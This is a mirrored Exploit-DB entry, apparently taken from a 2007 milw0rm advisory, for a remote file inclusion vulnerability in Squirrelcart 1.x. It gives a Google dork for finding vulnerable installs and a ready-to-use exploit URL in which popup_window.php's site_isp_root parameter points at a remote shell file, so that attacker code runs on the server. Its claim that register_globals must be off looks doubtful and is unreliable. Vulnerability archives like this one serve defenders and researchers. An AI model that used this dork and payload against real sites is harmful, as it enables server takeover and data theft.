exploit-db-mirror/exploits/php/webapps/4295.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
459 B
Text

Title : Squirrelcart <= 1.x.x Remote File Inclusion
URL : http://squirrelcart.com/
Google Dork : inurl:"/squirrelcart/" -squirrelcart.com
Author : ShaiMagal
Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla";
Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?
notes : register_globals = off is needed it seems.
# milw0rm.com [2007-08-19]